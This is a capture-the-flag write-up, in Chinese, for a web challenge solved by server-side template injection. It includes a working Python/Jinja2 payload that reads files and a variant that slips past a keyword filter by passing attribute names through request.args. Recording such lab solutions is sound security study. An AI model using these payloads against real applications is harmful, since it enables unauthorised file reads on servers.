Confusion1
考察:SSTI
参考
https://www.cnblogs.com/zhengna/p/13964561.html
进入网页,发现除了主页面,login和register都登不进去。
显示apache2.4.10,查询是否有相关可利用漏洞,失败。
根据wp,login.php和register.php下均有提示flag位置(!!!一定要查看源码,不能访问的页面也要查看
在URL上测试
http://220.249.52.134:45205/index.php/{{ 1+1}}
返回2,说明可以SSTI注入
尝试
''.__class__.__mro__[2].__subclasses__()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt').read()
不能得到结果,说明有绕过
新姿势,通过request传参进行绕过
http://220.249.52.134:45205/index.php/{{ ''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
cyberpeace{386fd2a442e4b6841a294c2f66c864a8}
SSTI新姿势
{{ ''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
# 注意,字符之间的连接点没了,以及括号()和下标[]需要放在里面